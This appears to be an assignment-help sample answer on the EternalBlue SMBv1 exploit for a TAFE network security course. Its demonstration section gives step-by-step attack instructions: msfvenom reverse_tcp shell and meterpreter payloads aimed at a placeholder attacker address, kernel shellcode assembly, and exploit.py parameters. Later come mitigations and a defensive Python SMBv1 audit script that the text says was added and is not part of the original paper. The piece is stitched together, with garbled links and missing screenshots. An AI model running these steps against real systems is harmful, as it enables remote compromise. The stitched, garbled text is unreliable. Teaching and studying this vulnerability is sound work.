
ITNET302A Advanced Network Security

  • Course Code: ITNET302A
  • University: Tafe NSW
  • Country: Australia

Question:

Some key points to consider including in your paper are:

  • Explanation of the vulnerability

  • Explanation and demonstration of the EternalBlue exploit

Include screenshots of network discovery, exploitation setup, exploitation success, and from your shell print the text file located

  • Risk assessment (including risk calculation) of the EternalBlue exploit to Files'R'Us

  • Theoretical explanation on the scope of the domain that would be impacted in the case of exploitation

 

Answer:

Introduction

Sometimes stylized as ETERNALBLUE, EternalBlue is an exploit developed by the American NSA, according to testimony by former NSA employees. The Shadow Brokers hacker group leaked it on 14th April, 2017, and it was used on 12th May, 2017 as part of the international WannaCry ransomware attack (Kao and Hsiao, 2018). EternalBlue targets a remote code execution vulnerability in the way the SMBv1 server handles particular requests. An attacker who successfully exploits the vulnerability gains the ability to execute code on the targeted server. In most situations, an unauthenticated attacker can exploit the vulnerability by sending a specially crafted packet to the targeted SMBv1 server. The security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests. EternalBlue exploits a vulnerability in Microsoft's implementation of the Server Message Block (SMB) protocol. The vulnerability is listed as CVE-2017-0144 in the Common Vulnerabilities and Exposures (CVE) catalog. It exists because the SMB version 1 (SMBv1) server in various versions of Microsoft Windows mishandles specially crafted packets from remote attackers, allowing them to execute arbitrary code on the target machine.

 

Demonstration of the EternalBlue exploit

This segment of the paper demonstrates the EternalBlue exploit using the Metasploit tool. This tool offers information about security vulnerabilities and aids in penetration testing and the development of IDS signatures (Dwyer, 2018). The paper analyses the EternalBlue exploit and describes step by step how the exploit works against the identified target. To start with, we must have both the target machine and the attacker machine.

  1. Windows Server 2012 R2 - Victim Machine

No changes are needed after installing the OS. It is only necessary to obtain its IP address and to know that the target machine is on during the attack.

  2. GNU/Linux – Attacker Machine

Any operating system can be used as long as one is well versed in these tools:

  • Python v2.7
  • NASM
  • Metasploit Framework

For the purpose of this paper, the following is the required lab configuration:

Attacker – IP: 10.0.2.6 Linux/ GNU Debian x64

Target - IP: 10.0.2.12 –Windows Server 2012 R2 x64

After setting up the lab, the first step of the EternalBlue exploit involves assembling the kernel shellcode developed for the exploit. Towards the end of the attack a userland shellcode will be added to it; this is the Metasploit payload to be executed on the victim machine. A shellcode developed by sleepya can be obtained from: www:gist.github.com/worawit/05105fce9e126ac9c85325f0b05d6501#file-eternalblue_x64_kshellcode-asm

The .asm file is saved after being downloaded from the link above and then assembled with NASM using the following command: nasm -f bin kernel_shell_x64.asm.

After assembling it, the next step is to generate the userland shellcode, which is a payload created with msfvenom. This demonstration will first use a reverse shell via TCP, followed by a meterpreter session. The two payloads can be generated separately as follows:

For windows/x64/shell/reverse_tcp:

msfvenom -p windows/x64/shell/reverse_tcp -f raw -o shell_msf.bin EXITFUNC=thread LHOST=[ATTACKER_IP] LPORT=4444

For windows/x64/meterpreter/reverse_tcp:

msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o meterpreter_msf.bin EXITFUNC=thread LHOST=[ATTACKER_IP] LPORT=4444

Hence, one is required to join the userland shellcode and the kernel shellcode. After assembling the shellcode and generating the Metasploit payloads that are needed, it is essential to concatenate them.

Thus, shell/reverse_tcp + kernel shellcode

Then, meterpreter/reverse_tcp + kernel shellcode:

On completing these two steps, two payloads for distinct attacks are ready to be used. To get a reverse shell, one uses sleepya’s exploit, which can be obtained from the link below: www.gist.github.com/worawit/074a27e90a3686506fc586249934a30ne.

There are two distinct approaches to successfully compromising the victim machine. The first is through the “Guest” account. This account is disabled by default in Windows Server 2012 R2. Nonetheless, if the account has been activated by the network administrator, one can exploit it and get a system shell on the targeted machine. The main step involves opening exploit.py in any text editor and indicating that this is the account which will be used to authenticate. On the attacker machine the file is saved with a .py extension. Before continuing, it is necessary to set up Metasploit so that it receives the reverse shell connection at the moment the shellcode is executed on the victim device.

Lines 42 and 43 in the above define this information. With these changes saved, one can continue by executing the exploit with these parameters: python exploit.py <ip_target> reverse_shell.bin 500. The 500 parameter corresponds to “numGroomConn”. Adjusting the number of “groom” connections helps in reaching adjoining kernel pool memory so that the buffer overwrite ends in the location needed and the shellcode executes correctly. For this userland shellcode one can use 500 “groom” connections. If the reverse connection is not received, this number can be increased further.

The Metasploit terminal will then receive the reverse shell.

Via a user and password. Another approach to a successful exploit is to use credentials obtained earlier from a local user account. As in the prior “Guest” case, the rights of the account one authenticates with do not matter; the terminal received will be a system one. Here one can edit exploit.py to add the information from the user account.

 

Likewise, save and execute the exploit.

This will give the same outcome.

From here one can configure Metasploit to receive the reverse connection and then obtain a meterpreter session with administrator privileges.

The exploit can be executed using the parameters “python exploit.py <ip_target> meterpreter.bin 200”. In this case, note the reduction of the groom connections to 200. The value can be increased if the exploit executes correctly but the session is not received.

On the Metasploit terminal one will immediately get the meterpreter session.

Risk assessment of the EternalBlue exploit to Files'R'Us

Risk is the likelihood of loss, for example the risk of a computer shutting down. A risk assessment calculates the likelihood of loss and its impact (Phomkeona et al., 2017). It needs to take both IT and business considerations into account. Therefore, there has to be a business justification for implementing mitigations. This is justified through the risk, or impact of loss, of what you are protecting. Risk is calculated as threat multiplied by vulnerability:

Risk = Threat x Vulnerability

A high threat with a high vulnerability carries a high risk, for example not installing antivirus on the receptionist’s computer. However, anything multiplied by zero is zero. A high threat with a low vulnerability can carry a low risk.

Scope of the domain that would be impacted in the case of exploitation

Exploitation encompasses global culture in the digital age. The act of breaking into a secure network serves several ends, from corporate reconnaissance to political insubordination and blatant theft. Exploitation affects organizations in a number of ways, some general, others specific to the reason behind the exploitation and the business in question. The direction of exploitation, whether a company exploits or gets exploited, also has an impact.

Exploitation has a substantial effect. Sensitive data is stolen, which is referred to as an "information breach". Various records are compromised. Computers are turned into DDoS nodes, attack relays, spam senders, and more (Shao et al., 2017). Performance slows to a crawl. Bandwidth is crippled by the tremendous amount of illicit traffic flooding through the computers. Each contact found is spammed with further exploit attempts. Web pages are defaced. The domain ends up being blacklisted for abuse. Everybody involved needs to be concerned about data fraud. Individual reputation is directly impacted. Rather than focusing on development and sales, staff members are occupied with damage control.

Immediate remediation actions

Awareness of the perils is the first step towards protection, both from being exploited and from dealing with the aftermath should it happen (Nakashima and Timberg, 2017). Safeguards that can be taken for better security include:

  • Physical security - Placing locks on doors
  • Operational security - Don’t have a green arrow pointing to the server room
  • Documentation - Document how systems talk to each other
  • Disaster plan - When it hits the fan, what’s the plan?

Preventative measures and mitigations for EternalBlue exploit impacts

This paper looks at five measures and mitigation practices that can be taken to minimize the impact of the EternalBlue exploit in future. These comprise the following:

Follow the Least Privilege Principle: access controls, including network and directory sharing permissions, should be configured with the least rights. Most users do not need admin privileges to undertake the required tasks on organization endpoints; user access should be the minimum that allows standard functioning.

Apply Patches and Disable SMB v1: to shield against the particular EternalBlue strain, one should simply apply the patch MS17-010 that Microsoft released a few months ago or disable the outdated Microsoft SMB protocol version 1.

Always Backup: backing up important data is a vital, table-stakes best practice, whether one is hit by a new exotic EternalBlue attack or the hard drive dies unexpectedly.

Block Internet Access: individual networks should not be open to SMB packets from the internet, since the Microsoft SMB protocol is designed to be internal.

Apply Application Control: regulating which executables have access to the file system can also contribute to the defensive mechanism.
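Before SMB v1 can be disabled as recommended above, the hosts that still depend on it have to be found. The following is an added example, not part of the original paper: it parses captured client-to-server frames from port 445 and separates clients that offer only SMBv1 dialects from those that can upgrade to SMB 2. The frames, host labels and function names are constructed for illustration.

```python
import struct

SMB1_MAGIC, SMB2_MAGIC = b"\xffSMB", b"\xfeSMB"
SMB1_HEADER_LEN = 32        # fixed size of the SMB1 header
SMB_COM_NEGOTIATE = 0x72    # SMB1 command code for Negotiate


def strip_transport(frame):
    """Drop the 4-byte direct-TCP header: a zero byte plus a 24-bit length."""
    if len(frame) < 4 or frame[0] != 0:
        raise ValueError("not a direct-TCP SMB session message")
    length = int.from_bytes(frame[1:4], "big")
    if len(frame) - 4 < length:
        raise ValueError("truncated SMB message")
    return frame[4:4 + length]


def smb1_dialects(msg):
    """Return the dialect strings offered in an SMB1 Negotiate request."""
    if len(msg) < SMB1_HEADER_LEN + 3:
        raise ValueError("SMB1 message too short")
    off = SMB1_HEADER_LEN + 1 + 2 * msg[SMB1_HEADER_LEN]  # skip parameter words
    if len(msg) < off + 2:
        raise ValueError("SMB1 message too short")
    (byte_count,) = struct.unpack_from("<H", msg, off)
    data = msg[off + 2:off + 2 + byte_count]
    if len(data) != byte_count:
        raise ValueError("dialect block truncated")
    dialects, pos = [], 0
    while pos < len(data):
        end = data.find(b"\x00", pos + 1)
        if data[pos] != 0x02 or end == -1:  # each entry: 0x02, text, NUL
            raise ValueError("malformed dialect entry")
        dialects.append(data[pos + 1:end].decode("ascii", "replace"))
        pos = end + 1
    return dialects


def classify(frame):
    """Label one client frame for an SMBv1 retirement audit."""
    msg = strip_transport(frame)
    if msg[:4] == SMB2_MAGIC:
        return "smb2-or-later"
    if msg[:4] != SMB1_MAGIC:
        return "not-smb"
    if len(msg) > 4 and msg[4] != SMB_COM_NEGOTIATE:
        return "smb1-session-traffic"
    # A multi-protocol Negotiate also lists "SMB 2.002" / "SMB 2.???".
    if any(d.startswith("SMB 2.") for d in smb1_dialects(msg)):
        return "smb1-negotiate-upgradable"
    return "smb1-only-client"


def frame_of(msg):
    """Constructed-sample helper: prepend the direct-TCP header."""
    return b"\x00" + len(msg).to_bytes(3, "big") + msg


def build_smb1_negotiate(dialects):
    """Constructed-sample helper: minimal SMB1 Negotiate with zeroed header."""
    data = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)
    header = SMB1_MAGIC + bytes([SMB_COM_NEGOTIATE]) + b"\x00" * 27
    return frame_of(header + b"\x00" + struct.pack("<H", len(data)) + data)


# Constructed frames, keyed by made-up host labels.
SAMPLES = {
    "legacy-host": build_smb1_negotiate(["LANMAN1.0", "NT LM 0.12"]),
    "modern-host": build_smb1_negotiate(["NT LM 0.12", "SMB 2.002", "SMB 2.???"]),
    "smb2-host": frame_of(SMB2_MAGIC + b"\x00" * 60),
}


def audit(samples):
    return {name: classify(frame) for name, frame in samples.items()}
```

Hosts labelled smb1-only-client are the ones that would lose file-share access when SMB v1 is switched off, so they are the ones to patch or replace first.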

 

Conclusion

Recently, cyber exploitation has gained a reputation as something more than mere cyber activity. The repercussions of these acts are regularly extreme, ranging from extraordinary monetary loss to breaches of sensitive military data. Accordingly, there is growing and widespread concern about the solution to this issue.

Then again, most of the general population is not familiar with the details surrounding these events. For them, espionage or cyber exploitation may sound similar, if not identical, to a cyber-attack. However comparable they may be, this paper has analyzed the EternalBlue exploit. The most well-known classification is by how the exploit communicates with the vulnerable application. A remote exploit operates over a network and exploits the security vulnerability without any prior access to the vulnerable system.

 

References

Akkas, A., Chachamis, C.N. and Fetahu, L., 2017. Malware Analysis of WanaCry Ransomware.

Dwyer, A., 2018. The NHS cyber-attack: A look at the complex environmental conditions of WannaCry.

Kao, D.Y. and Hsiao, S.C., 2018, February. The dynamic analysis of WannaCry ransomware. In Advanced Communication Technology (ICACT), 2018 20th International Conference on (pp. 159-166). IEEE.

Nakashima, E. and Timberg, C., 2017. NSA officials worried about the day its potent hacking tool would get loose. Then it did. Washington Post, [Online]. Available: https://www.washingtonpost.com/business/technology/nsa-officials-worried-about-the-day-its-potent-hacking-tool-would-get-loosethen-it-did/2017/05/16/50670b16-3978-11e7-a058-ddbb23c75d82_story.html.

Phomkeona, S., Okamura, K., Edwards, K. and Ban, Y., 2017. Zero-day Malicious Email Behavior Investigation and Analysis. Proceedings of the Asia-Pacific Advanced Network, 44, pp.8-12.

Shao, S., Tunc, C., Satam, P. and Hariri, S., 2017, September. Real-Time IRC Threat Detection Framework. In Foundations and Applications of Self* Systems (FAS* W), 2017 IEEE 2nd International Workshops on (pp. 318-323). IEEE.

Cite This Work

My Assignment Help. (2020). Advanced Network Security. Retrieved from https://myassignmenthelp.com/free-samples/itnet302a-advanced-network-security.